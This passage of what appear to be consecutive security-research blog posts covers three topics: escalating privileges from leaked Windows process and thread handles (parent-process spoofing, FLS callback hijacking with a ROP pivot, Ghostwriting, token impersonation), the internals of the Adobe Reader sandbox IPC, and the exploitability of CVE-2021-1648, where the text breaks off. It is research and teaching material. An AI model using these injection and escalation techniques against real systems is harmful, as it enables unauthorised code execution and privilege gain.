apply more to the handle itself than what it allows one to do.
Right off the bat, we’re going to dismiss the following:
To be clear I’m only suggesting that the above access rights cannot be
exploited on their own; they are, of course, very useful when roped in with
others. There may be weird edge cases in which one of these might be useful
(PROCESS_TERMINATE, for example), but barring any magic, I don’t see how.
This right is “required to create a process”, which is to say that we can spawn
child processes. To do this remotely, we just need to spawn a process and set
its parent to the privileged process we’ve got a handle to. This will create
the new process and inherit its parent token which will hopefully be a SYSTEM
token.
We should now have calc running with the privileged token. Obviously we’d want
to replace that with something more useful!
PROCESS_CREATE_THREAD
Here we’ve got the ability to use CreateRemoteThread, but can’t control any
memory in the target process. There are of course ways we can influence memory
without direct write access, such as WNF, but we’d still have no way of
resolving those addresses. As it turns out, however, we don’t need the control.
CreateRemoteThread can be pointed at a function with a single argument, which
gives us quite a bit of control. LoadLibraryA and WinExec are both great
candidates for executing child processes or loading arbitrary code.
As example, there’s an ANSI cmd.exe located in msvcrt.dll at offset 0x503b8.
We can pass this as an argument to CreateRemoteThread and trigger a WinExec
call to pop a shell:
We can do something similar for LoadLibraryA. This of course is predicated on
the system path containing a writable directory for our user.
PROCESS_DUP_HANDLE
Microsoft’s own documentation on process security and access rights points to
this specifically as a sensitive right. Using it, we can simply duplicate our
process handle with PROCESS_ALL_ACCESS, allowing us full RW to its address
space. As per Ivan Fratric’s JIT bug, it’s as simple as this:
Now we can simply follow the WriteProcessMemory/CreateRemoteThread strategy for
executing arbitrary code.
PROCESS_SET_INFORMATION
Granting this permission allows one to execute SetInformationProcess in
addition to several fields in NtSetInformationProcess. The latter is far more
powerful, but many of the PROCESSINFOCLASS fields available are either read
only or require additional privileges to actually set (SeDebugPrivilege for
ProcessExceptionPort and ProcessInstrumentationCallback(win7) for
example). Process Hacker[15] maintains an up to date definition of this class
and its members.
Of the available flags, none were particularly interesting on their own. I
needed to add PROCESS_VM_* privileges in order to make any usable and at
that point we defeat the purpose.
PROCESS_VM_*
This covers the three flavors of VM access: WRITE/READ/OPERATION. The first two
should be self-explanatory and the third allows one to operate on the virtual
address space itself, such as changing page protections (VirtualProtectEx) or
allocating memory (VirtualAllocEx). I won’t address each permutation of these
three, but I think it’s reasonable to assume that PROCESS_VM_WRITE is a
necessary requirement. While PROCESS_VM_OPERATION allows us to crash the
remote process which could open up other flaws, it’s not a generic nor elegant
approach. Ditto with PROCESS_VM_READ.
PROCESS_VM_WRITE proved to be a challenge on its own, and I was unable to
come up with a generic solution. At first blush, the entire set of
Shatter-like injection strategies documented by Hexacorn[12] seem like
they’d be perfect. They simply require the remote process to use windows,
clipboard registrations, etc. None of these are guaranteed, but chances are one
is bound to exist. Unfortunately for us, many of them restrict access across
sessions or scaling integrity levels. We can write into the remote process,
but we need some way to gain control over execution flow.
In addition to being unable to modify page permissions, we cannot read nor
map/allocate memory. There are plenty of ways we can leak memory from the
remote process without directly interfacing with it, however.
Using NtQuerySystemInformation, for example, we can enumerate all threads
inside a remote process regardless of its IL. This grants us a list of
SYSTEM_EXTENDED_THREAD_INFORMATION objects which contain, among other
things, the address of the TEB. NtQueryInformationProcess allows us to fetch
the remote process PEB address. This latter API requires the
PROCESS_QUERY_INFORMATION right, however, which ended up throwing a major
wrench in my plan. Because of this I’m appending PROCESS_QUERY_INFORMATION
onto PROCESS_VM_WRITE which gives us the necessary components to pull this
off. If someone knows of a way to leak the address of a remote process PEB
without it, I’d love to hear.
The approach I took was a bit loopy, but it ended up working reliably and
generically. If you’ve read my previous post on fiber local storage (FLS)[13],
this is the research I was referring to. If you haven’t, I recommend giving it
a brief read, but I’ll regurgitate a bit of it here.
Briefly, we can abuse fibers and FLS to overwrite callbacks which are executed
“…on fiber deletion, thread exit, and when an FLS index is freed”. The
primary thread of a process will always setup a fiber, thus there will always
be a callback for us to overwrite (msvcrt!_freefls). Callbacks are stored in
the PEB (FlsCallback) and the fiber local storage in the TEB (FlsData). By
smashing the FlsCallback we can obtain control over execution flow when one of
the fiber actions are taken.
With only write access to the process, however, this becomes a bit convoluted.
We cannot allocate memory and so we need some known location to put the
payload. In addition, the FlsCallback and FlsData variables in PEB/TEB are
pointers and we’re unable to read these.
Stashing the payload turned out to be pretty simple. Since we’ve established
we can leak PEB/TEB addresses we already have two powerful primitives. After
looking over both structures, I found that thread local storage (TLS) happened
to provide us with enough room to store ROP gadgets and a thin payload. TLS is
embedded within the structure itself, so we can simply offset into the TEB
address (which we have). If you’re unfamiliar with TLS, Skywing’s write-ups are
fantastic and have aged well[14].
Gaining control over the callback was a little trickier. A pointer to a
_FLS_CALLBACK_INFO structure is stored in the PEB (FlsCallback) and is an
opaque structure. Since we can’t actually read this pointer, we have no simple
way of overwriting the pointer. Or do we?
What I ended up doing is overwriting the FlsCallback pointer itself in the PEB,
essentially creating my own fake _FLS_CALLBACK_INFO structure in TLS. It’s a
pretty simple structure and really only has one value of importance: the
callback pointer.
In addition, as per the FLS article, we also need to take control over ECX/RCX.
This will allow us to stack pivot and continue executing our ROP payload. This
requires that we update the TEB->FlsData entry which we also are unable to
do, since it’s a pointer. Much like FlsCallback, though, I was able to just
overwrite this value and craft my own data structure, which also turned out to
be pretty simple. The TLS buffer ended up looking like this:
There just so happens to be a perfect stack pivot gadget located in
kernelbase!SwitchToFiberContext (or kernel32!SwitchToFiber on Windows 7):
12
7603c415 8ba1d8000000 mov esp,dword ptr [ecx+0D8h]
7603c41b c20400 ret 4
Putting this all together, execution results in:
1234567891011121314
eax=7603c415 ebx=7ffdf000 ecx=7ffded54 edx=00280bc9 esi=00000001 edi=7ffdee28
eip=7603c415 esp=0019fd6c ebp=0019fd84 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
kernel32!SwitchToFiber+0x115:
7603c415 8ba1d8000000 mov esp,dword ptr [ecx+0D8h]
ds:0023:7ffdee2c=7ffdee30
0:000> p
eax=7603c415 ebx=7ffdf000 ecx=7ffded54 edx=00280bc9 esi=00000001 edi=7ffdee28
eip=7603c41b esp=7ffdee30 ebp=0019fd84 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
kernel32!SwitchToFiber+0x11b:
7603c41b c20400 ret 4
0:000> dd esp l3
7ffdee30 41414141 41414141 41414141
Now we’ve got EIP and a stack pivot. Instead of marking memory and executing
some other payload, I took a quick and lazy strategy and simply called
LoadLibraryA to load a DLL off disk from an arbitrary location. This works
well, is reliable, and even on process exit will execute and block, depending
on what you do within the DLL. Here’s the final code to achieve all this:
If all works well you should see attempts to load AAAA.dll off disk when the
callback is executed (just close the process). As a note, we’re using
NtWriteVirtualMemory here because WriteProcessMemory requires
PROCESS_VM_OPERATION which we may not have.
Another variation of this access might be PROCESS_VM_WRITE|PROCESS_VM_READ.
This gives us visibility into the address space, but we still cannot allocate
or map memory into the remote process. Using the above strategy we can rid
ourselves of the PROCESS_QUERY_INFORMATION requirement and simply read the
PEB address out of TEB.
Finally, consider PROCESS_VM_WRITE|PROCESS_VM_READ|PROCESS_VM_OPERATION.
Granting us PROCESS_VM_OPERATION loosens the restrictions quite a bit, as we
can now allocate memory and change page permissions. This allows us to more
easily use the above strategy, but also perform inline and IAT hooks.
Thread
As with the process handles, there are a handful of access rights we can dismiss
immediately:
There’s quite a lot we can do with this, including everything described in the
following thread access rights sections. I personally find the
THREAD_DIRECT_IMPERSONATION strategy to be the easiest.
There is another option that is a bit more arcane, but equally viable. Note
that this thread access doesn’t give us VM read/write privileges, so there’s
no easy to way to “write” into a thread, since that doesn’t really make sense.
What we do have, however, is a series of APIs that sort of grant us that:
SetThreadContext[4] and GetThreadContext[5]. About a decade ago a code
injection technique dubbed Ghostwriting[6] was released to little fanfare. In
it, the author describes a code injection strategy that does not require the
typical win32 API calls; there’s no WriteProcessMemory, NtMapViewOfSection, or
even OpenProcess.
While the write-up is lacking in a few departments, it’s quite a clever bit of
code. In short, the author abuses the SetThreadContext/GetThreadContext
calls in tandem with a set of specific assembly gadgets to write a payload,
dword by dword, onto the threads stack. Once written, they use
NtProtectVirtualMemoryAddress to mark the code RWX and redirect code flow to
their payload.
For their write gadget, they hunt for a pattern inside NTDLL:
12
MOV [REG1], REG2
RET
They then locate a JMP $, or jump here, which will operate as an auto lock
and infinitely loop. Once we’ve found our two gadgets, we suspend the thread.
We update its RIP to point to the MOV gadget, set our REG1 to an adjusted RSP
so the return address is the JMP $, and set REG2 to the jump gadget. Here’s
my write function:
The SetContextRegister call simply assigns REG1 and REG2 in our gadget to the
appropriate registers. Once those are set, we set our stack base (adjusted from
threads RSP) and update RIP to our gadget. The first time we execute this we’ll
write our JMP $ gadget to the stack.
They use what they call a thread auto lock to control execution flow (edits
mine):
It’s really just a dumb waiter that allows the thread to execute a little bit
each run before checking if the “sink” gadget has been reached.
Once our execution hits the jump, we have our write primitive. We can now
simply adjust RIP back to the MOV gadget, update RSP, and set REG1 and REG2 to
any values we want.
I ported the core function of this technique to x64 to demonstrate its
viability. Instead of using it to execute an entire payload, I simply execute
LoadLibraryA to load in an arbitrary DLL at an arbitrary path. The code is
available on Github[11]. Turning it into something production ready is left as
an exercise for the reader ;)
Additionally, while attending Blackhat 2019, I saw a process injection talk by
the SafeBreach Labs group. They’ve release a code injection tool that contains
an x64 implementation of GhostWriting[10]. While I haven’t personally evaluated
it, it’s probably more production ready and usable than mine.
THREAD_DIRECT_IMPERSONATION
This differs from THREAD_IMPERSONATE in that it allows the thread token to be
impersonated, not simply TO impersonate. Exploiting this is simply a matter of
using the NtImpersonateThread[8] API, as pointed out by James Forshaw[0][7].
Using this we’re able to create a thread totally under our control and
impersonate the privileged one:
The hNewThread will now be executing with a SYSTEM token, allowing us to do
whatever we need under the privileged impersonation context.
THREAD_IMPERSONATE
Unfortunately I was unable to identify a surefire, generic method for
exploiting this one. We have no ability to query the remote thread, nor can we
gain any control over its execution flow. We’re simply allowed to manage its
impersonation state.
We can use this to force the privileged thread to impersonate us, using the
NtImpersonateThread call, which may unlock additional logic bugs in the
application. For example, if the service were to create shared resources under
a user context for which it would typically be SYSTEM, such as a file, we can
gain ownership over that file. If multiple privileged threads access it for
information (such as configuration) it could lead to code execution.
THREAD_SET_CONTEXT
While this right grants us access to SetThreadContext, it also conveniently
allows us to use QueueUserAPC. This is effectively granting us a
CreateRemoteThread primitive with caveat. For an APC to be processed by the
thread, it needs to enter an alertable state. This happens when a specific set
of win32 functions are executed, so it is entirely possible that the thread
never becomes alertable.
If we’re working with an uncooperative thread, SetThreadContext comes in
handy. Using it, we can force the thread to become alertable via the
NtTestAlert function. Of course, we have no ability to call
GetThreadContext and will therefore likely lose control of the thread after
exploitation.
In combination with THREAD_GET_CONTEXT, this right would allow us to
replicate the Ghostwriting code injection technique discussed in the
THREAD_ALL_ACCESS section above.
THREAD_SET_INFORMATION
Needed to set various ThreadInformationClass[9] values on a thread, usually via
NtSetInformationThread. After looking through all of these, I did not
identify any immediate ways in which we could influence the remote thread. Some
of the values are interesting but unusuable (ThreadSetTlsArrayAddress,
ThreadAttachContainer, etc) and are either not implemented/removed or
require SeDebugPrivilege or similar.
I’m not really sure what would make this a viable candidate either. There’s
really not a lot of juicy stuff that can be done via the available functions
THREAD_SET_LIMITED_INFORMATION
This allows the caller to set a subset of THREAD_INFORMATION_CLASS values,
namely: ThreadPriority, ThreadPriorityBoost, ThreadAffinityMask,
ThreadSelectedCpuSets, and ThreadNameInformation. None of these get us
anywhere near an exploitable primitive.
THREAD_SET_THREAD_TOKEN
Similar to THREAD_IMPERSONATE, I was unable to find a direct and generic
method of abusing this right. I can set the thread’s token or modify a few
fields (via SetTokenInformation), but this doesn’t grant us much.
Conclusion
I was a little disappointed in how uneventful thread rights seemed to be.
Almost half of them proved to be unexploitable on their own, and even in
combination did not turn much up. As per above, having one of the following
three privileges is necessary to turn a leaked thread handle into something
exploitable:
This post kicks off a short series into reversing the Adobe Reader sandbox. I initially started this research early last year and have been working on it off and on since. This series will document the Reader sandbox internals, present a few tools for reversing/interacting with it, and a description of the results of this research. There may be quite a bit of content here, but I’ll be doing a lot of braindumping. I find posts that document process, failure, and attempt to be far more insightful as a researcher than pure technical result.
I’ve broken this research up into two posts. Maybe more, we’ll see. The first here will detail the internals of the sandbox and introduce a few tools developed, and the second will focus on fuzzing and the results of that effort.
This post focuses primarily on the IPC channel used to communicate between the sandboxed process and the broker. I do not delve into how the policy engine works or many of the restrictions enabled.
Introduction
This is by no means the first dive into the Adobe Reader sandbox. Here are a few prior examples of great work:
Breeding Sandworms was a particularly useful introduction to the sandbox, as it describes in some detail the internals of transaction and how they approached fuzzing the sandbox. I’ll detail my approach and improvements in
part two of this series.
In addition, the ZDI crew of Abdul-Aziz Hariri, et al. have been hammering on
the Javascript side of things for what seems like forever (Abusing Adobe Reader’s Javascript APIs)
and have done some great work in this area.
After evaluating existing research, however, it seemed like there was more work to be done in a more open source fashion. Most sandbox escapes in Reader these days opt instead to target Windows itself via win32k/dxdiag/etc and not the sandbox broker. This makes some sense, but leaves a lot of attack surface unexplored.
Note that all research was done on Acrobat Reader DC 20.6.20034 on a Windows 10 machine. You can fetch installers for old versions of Adobe Reader
here.
I highly recommend bookmarking this. One of my favorite things to do on a new target is pull previous bugs and affected versions and run through root cause and exploitation.
Sandbox Internals Overview
Adobe Reader’s sandbox is known as protected mode and is on by default, but can be toggled on/off via preferences or the registry. Once Reader launches, a child process is spawned under low integrity and a shared memory
section mapped in. Inter-process communication (IPC) takes place over this channel, with the parent process acting as the broker.
Adobe actually published some of the sandbox source code to Github over 7 years ago, but it does not contain any of their policies or modern tag interfaces. It’s useful for figuring out variables and function names during reversing,
and the source code is well written and full of useful comments, so I recommend pulling it up.
Reader uses the Chromium sandbox (pre Mojo), and I recommend the following resources for the specifics here:
These days it’s known as the “legacy IPC” and has been replaced by Mojo in Chrome. Reader actually uses Mojo to communicate between its RdrCEF (Chromium Embedded Framework) processes which handle cloud connectivity, syncing, etc. It’s possible Adobe plans to replace the broker legacy API with Mojo at some point, but this has not been announced/released yet.
We’ll start by taking a brief look at how a target process is spawned, but the main focus of this post will be the guts of the IPC mechanisms in play. Execution of the child process first begins with BrokerServicesBase::SpawnTarget.
This function crafts the target process and its restrictions. Some of these
are described here in greater detail, but they are as follows:
123456789101112131415
1. Create restricted token
- via `CreateRestrictedToken`
- Low integrity or AppContainer if available
2. Create restricted job object
- No RW to clipboard
- No access to user handles in other processes
- No message broadcasts
- No global hooks
- No global atoms table access
- No changes to display settings
- No desktop switching/creation
- No ExitWindows calls
- No SystemParamtersInfo
- One active process
- Kill on close/unhandled exception
From here, the policy manager enforces interceptions, handled by the
InterceptionManager,
which handles hooking and rewiring various Win32 functions via the target process to the broker. According to documentation, this is not for security, but rather:
1
[..] designed to provide compatibility when code inside the sandbox cannot be modified to cope with sandbox restrictions. To save unnecessary IPCs, policy is also evaluated in the target process before making an IPC call, although this is not used as a security guarantee but merely a speed optimization.
From here we can now take a look at how the IPC mechanisms between the target and broker process actually work.
The broker process is responsible for spawning the target process, creating a shared memory mapping, and initializing the requisite data structures. This shared memory mapping is the medium in which the broker and target communicate and exchange data. If the target wants to make an IPC call, the following happens at a high level:
The target finds a channel in a free state
The target serializes the IPC call parameters to the channel
The target then signals an event object for the channel (ping event)
The target waits until a pong event is signaled
At this point, the broker executes ThreadPingEventReady, the IPC processor entry point, where the following occurs:
The broker deserializes the call arguments in the channel
Sanity checks the parameters and the call
Executes the callback
Writes the return structure back to the channel
Signals that the call is completed (pong event)
There are 16 channels available for use, meaning that the broker can service up to 16 concurrent IPC requests at a time. The following diagram describes a high level view of this architecture:
From the broker’s perspective, a channel can be viewed like so:
In general, this describes what the IPC communication channel between the broker and target looks like. In the following sections we’ll take a look at these in more technical depth.
IPC Internals
The IPC facilities are established via TargetProcess::Init, and is really what we’re most interested in. The following snippet describes how the shared memory mapping is created and established between the broker and target:
The calculated shared_mem_size in the source code here comes out to 65536 bytes, which isn’t right. The shared section is actually 0x20000 bytes in modern Reader binaries.
Once the mapping is established and policies copied in, the SharedMemIPCServer
is initialized, and this is where things finally get interesting. SharedMemIPCServer initializes the ping/pong events for communication, creates channels, and registers callbacks.
The previous architecture diagram provides an overview of the structures and layout of the section at
runtime. In short, a ServerControl is a broker-side view of an IPC channel. It contains the server side event handles, pointers to both the channel and its buffer, and general information about the connected IPC endpoint. This structure is not visible to the target process and exists only in the broker.
A ChannelControl is the target process version of a ServerControl; it contains the target’s event handles, the state of the channel, and information about where to find the channel buffer. This channel buffer is where the CrossCallParams can be found as well as the call return information after a successful IPC dispatch.
Let’s walk through what an actual request looks like. Making an IPC request requires the target
to first prepare a CrossCallParams structure. This is defined as a class, but we can model it as a struct:
I’ve also gone ahead and defined a few other structures needed to complete the picture. Note that the return structure, CrossCallReturn, is embedded within the body of the CrossCallParams.
There’s a great ASCII diagram provided in the sandbox source code that’s highly instructive, and I’ve duplicated it below:
A tag is a dword indicating which function we’re invoking (just a number between 1 and approximately 255, depending on your version). This is handled server side dynamically, and we’ll explore that further later on.
Each parameter is then sequentially represented by a ParamInfo structure:
The offset is the delta value to a region of memory somewhere below the CrossCallParams structure. This is handled in the Chromium source code via the ptrdiff_t type.
Let’s look at a call in memory from the target’s perspective. Assume the channel buffer is at 0x2a10134:
0x2a10134 shows we’re invoking tag 3, which carries 7 parameters (0x2a10170).
The first argument is type 0x1 (we’ll describe types later on), is at delta
offset 0xa0, and is 0x86 bytes in size. Thus:
This shows the delta of the parameter data and, based on the parameter type, we know it’s a unicode string.
With this information, we can craft a buffer targeting IPC tag 3 and move onto
sending it. To do this, we require the
IPCControl
structure. This is a simple structure defined at the start of the IPC shared memory section:
So we have 16 channels, a handle to server_alive, and the start of our
ChannelControl array.
The server_alive handle is a mutex used to signal if the server has crashed.
It’s used during tag invocation in SharedmemIPCClient::DoCall, which we’ll describe later on. For now, assume that if we WaitForSingleObject on this and it returns WAIT_ABANDONED, the server has crashed.
ChannelControl is a structure that describes a channel, and is again defined as:
The channel_base describes the channel’s buffer, ie. where the CrossCallParams structure can be found. This is an offset from the base of the shared memory section.
state is an enum that describes the state of the channel:
The ping and pong events are, as previously described, used to signal to the opposite endpoint that data is ready for consumption. For example, when the client has written out its CrossCallParams and ready for the server, it signals:
When the server has completed processing the request, the pong_event is signaled and the client reads back the call result.
A channel is fetched via SharedMemIPCClient::LockFreeChannel and is invoked when GetBuffer is called. This simply identifies a channel in the IPCControl array wherein state == kFreeChannel, and sets it to kBusyChannel. With a
channel, we can now write out our CrossCallParams structure to the shared memory buffer. Our target buffer begins at channel->channel_base.
Writing out the CrossCallParams has a few nuances. First, the number of
actual parameters is NUMBER_PARAMS+1. According to the source:
1234
// Note that the actual number of params is NUMBER_PARAMS + 1
// so that the size of each actual param can be computed from the difference
// between one parameter and the next down. The offset of the last param
// points to the end of the buffer and the type and size are undefined.
Note the offset written is the offset for index+1. In addition, this offset is aligned. This is a pretty simple function that byte aligns the delta inside the channel buffer:
12345678
// Increases |value| until there is no need for padding given the 2*pointer
// alignment on the platform. Returns the increased value.
// NOTE: This might not be good enough for some buffer. The OS might want the
// structure inside the buffer to be aligned also.
size_t Align(size_t value) {
size_t alignment = sizeof(ULONG_PTR) * 2;
return ((value + alignment - 1) / alignment) * alignment;
}
Because the Reader process is x86, the alignment is always 8.
The pseudo-code for writing out our CrossCallParams can be distilled into the following:
123456789101112131415161718192021222324252627
write_uint(buffer, tag);
write_uint(buffer+0x4, is_in_out);
// reserve 52 bytes for CrossCallReturn
write_crosscall_return(buffer+0x8);
write_uint(buffer+0x3c, param_count);
// calculate initial delta
delta = ((param_count + 1) * 12) + 12 + 52;
// write out the first argument's offset
write_uint(buffer + (0x4 * (3 * 0 + 0x11)), delta);
for idx in range(param_count):
write_uint(buffer + (0x4 * (3 * idx + 0x10)), type);
write_uint(buffer + (0x4 * (3 * idx + 0x12)), size);
// ...write out argument data. This varies based on the type
// calculate new delta
delta = Align(delta + size)
write_uint(buffer + (0x4 * (3 * (idx+1) + 0x11)), delta);
// finally, write the tag out to the ChannelControl struct
write_uint(channel_control->tag, tag);
Once the CrossCallParams structure has been written out, the sandboxed process signals the ping_event and the broker is triggered.
Broker side handling is fairly straightforward. The server registers a ping_event handler during SharedMemIPCServer::Init:
The ThreadPingEventReady function marks the channel as kAckChannel, fetches a pointer to the provided buffer, and invokes InvokeCallback. Once this
returns, it copies the CrossCallReturn structure back to the channel and signals the pong_event mutex.
InvokeCallback parses out the buffer and handles validation of data, at a high level (ensures strings are strings, buffers and sizes match up, etc.). This is probably a good time to document the supported argument types. There are 10 types in total, two of which are placeholder:
These are taken from internal_types,
but you’ll notice there are two additional types: ASCII_TYPE and MEM_TYPE, and are unique to Reader. ASCII_TYPE is, as expected, a simple 7bit ASCII string. MEM_TYPE is a memory structure used by the broker to read
data out of the sandboxed process, ie. for more complex types that can’t be trivially passed via the API. It’s additionally used for data blobs, such as PNG images, enhanced-format datafiles, and more.
Some of these types should be self-explanatory; WCHAR_TYPE is naturally a wide char, ASCII_TYPE an ascii string, and ULONG_TYPE a ulong. Let’s look at a few of the non-obvious types, however: VOIDPTR_TYPE, INPTR_TYPE, INOUTPTR_TYPE, and MEM_TYPE.
Starting with VOIDPTR_TYPE, this is a standard type in the Chromium sandbox so we can just refer to the source code. SharedMemIPCServer::GetArgs calls GetParameterVoidPtr. Simply, once the value itself is extracted it’s cast to a void ptr:
1
*param = *(reinterpret_cast<void**>(start));
This allows tags to reference objects and data within the broker process itself. An example might be NtOpenProcessToken, whose first parameter is a handle to the target process. This would be retrieved first by a call to OpenProcess, handed back to the child process, and then supplied in any future calls that may need to use the handle as a VOIDPTR_TYPE.
In the Chromium source code, INPTR_TYPE is extracted as a raw value via GetRawParameter and no additional processing is performed. However, in Adobe Reader, it’s actually extracted in the same way INOUTPTR_TYPE is.
INOUTPTR_TYPE is wrapped as a CountedBuffer and may be written to during the IPC call. For example, if CreateProcessW is invoked, the PROCESS_INFORMATION pointer will be of type INOUTPTR_TYPE.
The final type is MEM_TYPE, which is unique to Adobe Reader. We can define the structure as:
As mentioned, this type is primarily used to transfer data buffers to and from the broker process. It seems crazy. Each tag is responsible for performing its own validation of the provided values before they’re used in any ReadProcessMemory/WriteProcessMemory call.
Once the broker has parsed out the passed arguments, it fetches the context dispatcher and identifies our tag handler:
123
ContextDispatcher = *(int (__thiscall ****)(_DWORD, int *, int *))(Context + 24);// fetch dispatcher function from Server control
target_info = Context + 28;
handler = (**ContextDispatcher)(ContextDispatcher, &ipc_params, &callback_generic);// PolicyBase::OnMessageReady
The handler is fetched from
PolicyBase::OnMessageReady,
which winds up calling
Dispatcher::OnMessageReady.
This is a pretty simple function that crawls the registered IPC tag list for
the correct handler. We finally hit InvokeCallbackArgs, unique to Reader,
which invokes the handler with the proper argument count:
In total, Reader supports tag functions with up to 17 arguments. I have no idea why that would be necessary, but it is. Additionally note the first two arguments to each tag handler: context handler (dispatcher) and CrossCallParamsEx. This last structure is actually the broker’s version of a CrossCallParams with more paranoia.
A single function is used to register IPC tags, called from a single initialization function, making it relatively easy for us to scrape them all at runtime. Pulling out all of the IPC tags can be done both statically and dynamically; the former is far easier, the latter is more accurate. I’ve implemented a static generator using IDAPython, available in this project’s repository (ida_find_tags.py), and can be used to pull all supported IPC tags out of Reader along with their parameters. This is not going to be wholly indicative of all possible calls, however. During initialization of the sandbox, many feature checks are performed to probe the availability of certain capabilities. If these fail, the tag is not registered.
Tags are given a handle to CrossCallParamsEx, which gives them access to the CrossCallReturn structure. This is defined here and, repeated from above, defined as:
This 52 byte structure is embedded in the CrossCallParams transferred by the sandboxed process. Once the tag has returned from execution, the following occurs:
123456789101112
if (error) {
if (handler)
SetCallError(SBOX_ERROR_FAILED_IPC, call_result);
} else {
memcpy(call_result, &ipc_info.return_info, sizeof(*call_result));
SetCallSuccess(call_result);
if (params->IsInOut()) {
// Maybe the params got changed by the broker. We need to upadte the
// memory section.
memcpy(ipc_buffer, params.get(), output_size);
}
}
and the sandboxed process can finally read out its result. Note that this mechanism does not allow for the exchange of more complex types, hence the availability of MEM_TYPE. The final step is signaling the pong_event, completing the call and freeing the channel.
Tags
Now that we understand how the IPC mechanism itself works, let’s examine the implemented tags in the sandbox. Tags are registered during initialization by a function we’ll call InitializeSandboxCallback. This is a large function that handles allocating sandbox tag objects and invoking their respective initalizers. Each initializer uses a function, RegisterTag, to construct and register individual tags. A tag is defined by a SandTag structure:
Here we see tag 3 with 7 arguments; the first is WCHAR_TYPE and the remaining 6 are ULONG_TYPE. This lines up with what know to be the NtCreateFile tag handler.
Each tag is part of a group that denotes its behavior. There are 20 groups in total:
The names were extracted either from the Reader binary itself or through correlation with Chromium. Each dispatcher implements an initialization routine that invokes RegisterDispatchFunction for each tag. The number of registered tags will differ depending on the installation, version, features, etc. of the Reader process. SandboxBrokerServerDispatcher, for example, can have a sway of approximately 25 tags.
Instead of providing a description of each dispatcher in this post, I’ve instead put together a separate page, which can be found here. This page can be used as a tag reference and has some general information about each. Over time I’ll add my notes on the calls. I’ve additionally pushed the scripts used to extract tag information from the Reader binary and generate the table to the sander repository detailed below.
libread
Over the course of this research, I developed a library and set of tools for examining and exercising the Reader sandbox. The library, libread, was developed to programmatically interface with the broker in real time,
allowing for quickly exercising components of the broker and dynamically reversing various facilities. In addition, the library was critical during my fuzzing expeditions. All of the fuzzing tools and data will be available in the next post in this series.
libread is fairly flexible and easy to use, but still pretty rudimentary and, of course, built off of my reverse engineering efforts. It won’t be feature complete nor even completely accurate. Pull requests are welcome.
The library implements all of the notable structures and provides a few helper functions for locating the ServerControl from the broker process. As we’ve seen, a ServerControl is a broker’s view of a channel and it is held by the broker alone. This means it’s not somewhere predictable in shared memory and we’ve got to scan the broker’s memory hunting it. From the sandbox side there is also a find_memory_map helper for locating the base address of the shared memory map.
In addition to this library I’m releasing sander. This is a command line tool that consumes libread to provide some useful functionality for inspecting the sandbox:
1234567
$ sander.exe -h
[-] sander: [action] <pid>
-m - Monitor mode
-d - Dump channels
-t - Trigger test call (tag 62)
-c - Capture IPC traffic and log to disk
-h - Print this menu
The most useful functionality provided here is the -m flag. This allows one to monitor the IPC calls and their arguments in real time:
We’re also able to dump all IPC calls in the brokers’ channels (-d), which can help debug threading issues when fuzzing, and trigger a test IPC call (-t). This latter function demonstrates how to send your own IPC calls via libread as well as allows you to test out additional tooling.
The last available feature is the -c flag, which captures all IPC traffic and logs the channel buffer to a file on disk. I used this primarily to seed part of my corpus during fuzzing efforts, as well as aid during some reversing efforts. It’s extremely useful for replaying requests and gathering a baseline corpus of real traffic. We’ll discuss this further in forthcoming posts.
That about concludes this initial post. Next up I’ll discuss the various fuzzing strategies used on this unique interface, the frustrating amount of failure, and the bugs shooken out.
In this post we’ll examine the exploitability of CVE-2021-1648, a privilege escalation bug in splwow64. I actually started writing this post to organize my notes on the bug and subsystem, and was initially skeptical of its exploitability. I went back and forth on the notion, ultimately ditching the bug. Regardless, organizing notes and writing blogs can be a valuable exercise! The vector is useful, seems to have a lot of attack surface, and will likely crop up again unless Microsoft performs a serious exorcism on the entire spooler architecture.
This bug was first detailed by Google Project Zero (GP0) on December 23, 2020[0]. While it’s unclear from the original GP0 description if the bug was
discovered in the wild, k0shl later detailed that it was his bug reported to MSRC in July 2020[1] and only just patched in January of 2021[2]. Seems, then,
that it was a case of bug collision. The bug is a usermode crash in the splwow64 process, caused by a wild memcpy in one of the LPC endpoints. This could lead to a privilege escalation from a low IL to medium.
This particular vector has a sordid history that’s probably worth briefly detailing. In short, splwow64 is used to host 64-bit usermode printer drivers
and implements an LPC endpoint, thus allowing 32-bit processes access to 64-bit printer drivers. This vector was popularized by Kasperksy in their great
analysis of Operation Powerfall, an APT they detailed in August of 2020[3]. As part of the chain they analyzed CVE-2020-0986, effectively the same bug as
CVE-2021-1648, as noted by GP0. In turn, CVE-2020-0986 is essentially the same bug as another found in the wild, CVE-2019-0880[4]. Each time Microsoft failed
to adequately patch the bug, leading to a new variant: first there were no pointer checks, then it was guarded by driver cookies, then offsets. We’ll look
at how they finally chose to patch the bug later — for now.
I won’t regurgitate how the LPC interface works; for that, I recommend reading Kaspersky’s Operation Powerfall post[3] as well as the blog by ByteRaptor[4].
Both of these cover the architecture of the vector well enough to understand what’s happening. Instead, we’ll focus on what’s changed since CVE-2020-0986.
To catch you up very briefly, though: splwow64 exposes an LPC endpoint that
any process can connect to and send requests. These requests carry opcodes and
input parameters to a variety of printer functions (OpenPrinter, ClosePrinter,
etc.). These functions occasionally require pointers as input, and thus the
input buffer needs to support those.
As alluded to, Microsoft chose to instead use offsets in the LPC request buffers instead of raw pointers. Since the input/output addresses were to be
used in memcpy’s, they need to be translated back from offsets to absolute addresses. The functions UMPDStringFromPointerOffset, UMPDPointerFromOffset, and UMPDOffsetFromPointer were added to accomodate this need. Here’s UMPDPointerFromOffset:
So as per the GP0 post, the buffer addresses are indeed restricted to
<=0x7fffffff. Implicit in this is also the fact that our offset is unsigned,
meaning we can only work with positive numbers; therefore, if our target
address is somewhere below our lpBufStart, we’re out of luck.
This new offset strategy kills the previous techniques used to exploit this
vulnerability. Under CVE-2020-0986, they exploited the memcpy by targeting a
global function pointer. When request 0x6A is called, a function
(bLoadSpooler) is used to resolve a dozen or so winspool functions used for
interfacing with printers:
These global variables are “protected” by RtlEncodePointer, as detailed by
Kaspersky[3], but this is relatively trivial to break when executing locally.
Using the memcpy with arbitrary src/dst addresses, they were able to overwrite
the function pointers and replace one with a call to LoadLibrary.
Unfortunately, now that offsets are used, we can no longer target any arbitrary
address. Not only are we restricted to 32-bit addresses, but we are also
restricted to addresses >= the message buffer and <= 0x7fffffff.
I had a few thoughts/strategies here. My first attempt was to target UMPD
